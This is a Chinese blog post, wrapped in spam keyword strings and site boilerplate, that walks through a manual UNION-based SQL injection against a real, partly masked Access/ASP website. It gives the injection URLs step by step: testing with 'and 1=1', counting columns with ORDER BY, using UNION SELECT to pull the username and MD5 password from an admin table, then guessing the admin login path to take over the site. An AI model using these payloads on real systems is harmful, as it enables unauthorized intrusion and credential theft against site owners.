91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

【實戰】利用聯合查詢--手工SQL注入拿下網站

發布時間:2020-07-16 06:49:45 來源:網絡 閱讀:1742 作者:CircleAgain 欄目:安全技術

        看到很多腳本小子,工具黨用啊D,明小子,穿山甲對網站掃來掃去,拿個后臺什么的,其實基礎是最重要的,今天我來說一下純手工注入一個站點。

 

目標網址:http://www.******.com/about.asp?id=1

 

1.首先確認這里是否存在整型注入,很簡單,url后加' and 1=1 and 1=2,不細說。同時我們還判斷出這是Access的數據庫。

【實戰】利用聯合查詢--手工SQL注入拿下網站

 

2.利用order by判斷表項有幾個;

    http://www.******.com/about.asp?id=1 order by 4(這里的5報錯,4正確,就是4個了)

 

3.然后測試顯示位,2,3位可顯;

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,2,3,4 from admin

【實戰】利用聯合查詢--手工SQL注入拿下網站

 

4.在顯示位猜測字段值;這里的表名,字段名根據經驗來試;常見的就那幾種;我們得到了用戶名和密碼(MD5加密的);

    http://www.******.com/about.asp?id=1 and 1=2 union select 1,username,3,4 from admin
    http://www.******.com/about.asp?id=1 and 1=2 union select 1,password,3,4 from admin

【實戰】利用聯合查詢--手工SQL注入拿下網站

【實戰】利用聯合查詢--手工SQL注入拿下網站

 

5.拿到用戶名密碼后,尋找后臺,常見的admin/login/manager/admin_login等可以試一試,成功登陸,搞定。提權后面再說咯。

【實戰】利用聯合查詢--手工SQL注入拿下網站

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

东宁县| 滕州市| 凤台县| 获嘉县| 渝中区| 隆化县| 永宁县| 文化| 玉林市| 延寿县| 深州市| 茶陵县| 德保县| 吕梁市| 垦利县| 同仁县| 常熟市| 双流县| 河津市| 龙游县| 安陆市| 郑州市| 华容县| 沈丘县| 临沭县| 常山县| 河北省| 高碑店市| 油尖旺区| 大丰市| 旅游| 磴口县| 永清县| 延长县| 武冈市| 定州市| 福泉市| 临海市| 灵台县| 屏边| 安阳市|